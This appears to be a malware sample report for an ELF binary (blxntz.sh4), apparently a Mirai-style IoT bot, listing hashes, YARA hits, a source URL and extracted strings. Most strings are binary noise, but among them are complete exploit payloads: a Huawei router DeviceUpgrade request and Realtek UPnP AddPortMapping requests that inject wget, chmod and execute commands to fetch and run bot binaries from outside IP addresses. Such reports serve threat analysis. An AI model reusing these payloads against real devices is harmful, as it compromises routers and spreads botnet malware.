Sample details: 47298bb4284110b7e0ea7d192b37ee82 --

Hashes
MD5: 47298bb4284110b7e0ea7d192b37ee82
SHA1: fc1fdabcc1712fa09c85d8d47d94d4c4ac8963ad
SHA256: 347c22d6ec00e5f655dec69ec323445866506085fb8325e08402ba90a578b470
SSDEEP: 1536:b/2DtydazaekQwt1Ps0fizorhXyLrRNJmBHUkHnCZ5wcr:buDMggQNYi0rkJmB04ny
Details
File Type: ELF
Yara Hits
YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/Big_Numbers1 |
Source
http://192.119.111.12/bins/blxntz.sh4
Strings
		3=R'04
2)%#a)')A
AMB[!+'{!
B#a=A(1
;"s4"!
;"s0"!
;"G7"!
/sm"O,
qsj !<
Lds`La
Lds`La
AmH|g;"'
2)'#a)#)A
AmB{!+#;!
AmH<c{!!
";c=@ 
/Sn"O}
P)'#a)#
AmB{!+#;!
}b`fBr-a
 (w$Q.u
P)'#a)#
AmB{!+#;!
=b4r-a
-b,j|a
d$Q u@
P)'#a)#
AmB{!+#;!
&	tpgc`
"ca!# 
P)'#a)#
AmB{!+#;!
#nla,b
`"1!Cc
)'#a)#
AmB{!+#;!
^]cla\
APe|l3j
)'#a)#
AmB{!+#;!
R#ay!p1
)'#a)#)A
AmB{!+#;!
Q{#+#y
2*Uk!g
7zPz](p
)'#a)#
AmB{!+#;!
2-a#`)@
/s`miCWDX
	t@bsa9'
`)A|1)@,b9(
P2c003
3a9'CV9"
C)#8#a
"Bc#`ra
Gz#:"* 
f*!2-z#
Az"j!#c
ech3fsb
"ca:!#c
Cb+z":&#aj"R*
P2c003
3a9'CV9"
Cc,3Sf
C)#8#a
g3amA|1Qf
ql22,!!!%
;"Sak"I
B<cmA{"C
Cc,3Sf
a(1f1Y
VBa,6f
Sb)BSa
h.d^cba|1
b:" !ba|1
" !ba|1
" !ba|1
Sb)BSa
h.d^cba|1
b:" !ba|1
" !ba|1
" !ba|1
r,aV11
CcKc8#
(w2"$qq
(w2"$qq
(w2"$qq
3e3a u
a,q3b2
sc&0(C
c`K [ h&
qQSRVSWTXUYVZW[
qVcVf(@Vg= Vhm#Vi}&Vj
#`K`cm
vra2"qS
bCa-GSP
r'WCa	
s"f8#r!
j"UCc!X
j#WCc"U
rCc$V#W
j%XCc$V
Cb\fca
x'R$x'
sarb(1
,93fsesh
nRR8##f
eQQ(1!A!A
A8#,13
#cL33d
BcAR2a3f&g
2("!ba
=R;Q 1	
da)mf0a
(-b2Qq
Q-b"(]e
sc-Cy!sb
"{#;""*
/Ck"O;
 HTTP/1.1
User-Agent: 
Host: 
Cookie: 
Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 137.74.218.154 -l /tmp/binary -r /bins/blxntz.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
192.119.111.12
POST /picdesc.xml HTTP/1.1
Host: 127.0.0.1:52869
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://165.22.227.164/bins/blxntz.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
POST /wanipcn.xml HTTP/1.1
Host: 127.0.0.1:52869
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://165.22.227.164/bins/blxntz.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
5: '8%
5%!5&=;
'!$$;& 
$5''#;&0
509=:efg`
& agad
<;`!?!b5 
?;: fdd`
<!: acam
509=:efg
g1$a#f!
,7gaee
,7gael
,7gaea
"' 5&759fdea
fdeadbdf
. 1m,ea
"1& 1,fa1? ?'efg
0125!8 
'<188T
1:5681T
'-' 19T
{6=:{6!'-6;,t
nt5$$81 t:; t2;!:0T
:7;&&17 T
{6=:{6!'-6;,t$'T
{6=:{6!'-6;,t?=88tymtT
{$&;7{T
{95$'T
{$&;7{:1 { 7$T
{' 5 !'T
z5:=91T
{$&;7{:1 {&;! 1T
5''#;&0T
aMLLGAVKML
CNKTG"
cAAGRV
CRRNKACVKML
ZJVON	ZON
CRRNKACVKML
cAAGRV
nCLEWCEG
aMLVGLV
CRRNKACVKML
WPNGLAMFGF"
QGVaMMIKG
PGDPGQJ
NMACVKML
AMMIKG
AMLVGLV
NGLEVJ
VPCLQDGP
GLAMFKLE
AJWLIGF"
AMLLGAVKML
QGPTGP
FMQCPPGQV"
{1 7{&1';8"z7;:2T
:591'1&"1&tT
{01"{#5 7<0;3T
{01"{9='7{#5 7<0;3T
$662*7!E
1: 1&T
e365`70;9ag:<$ef1=d?2>T
oMXKNNC
uKLFMUQ
cRRNGuG@iKV
aJPMOG
qCDCPK
oMXKNNC
uKLFMUQ
cRRNGuG@iKV
aJPMOG
qCDCPK
oMXKNNC
uKLFMUQ
cRRNGuG@iKV
aJPMOG
qCDCPK
oMXKNNC
uKLFMUQ
cRRNGuG@iKV
aJPMOG
qCDCPK
oMXKNNC
oCAKLVMQJ
cRRNGuG@iKV
tGPQKML
qCDCPK
oMXKNNC
AMORCVK@NG
uKLFMUQ
vPKFGLV
oMXKNNC
AMORCVK@NG
uKLFMUQ
vPKFGLV
kLDMrCVJ
oMXKNNC
AMORCVK@NG
uKLFMUQ
vPKFGLV
oqkgaPCUNGP
aGLVGP
oMXKNNC
AMORCVK@NG
uKLFMUQ
vPKFGLV
kLDMrCVJ
oMXKNNC
AMORCVK@NG
uKLFMUQ
vPKFGLV
dWLuG@rPMFWAVQ
oMXKNNC
oCAKLVMQJ
dKPGDMZ
oMXKNNC
oCAKLVMQJ
dKPGDMZ
oMXKNNC
oCAKLVMQJ
dKPGDMZ
oMXKNNC
oCAKLVMQJ
dKPGDMZ
oMXKNNC
uKLFMUQ
cRRNGuG@iKV
aJPMOG
;::17 10t
;!&71t
:3=:1t
/dev/null
.shstrtab
.rodata
.ctors
.dtors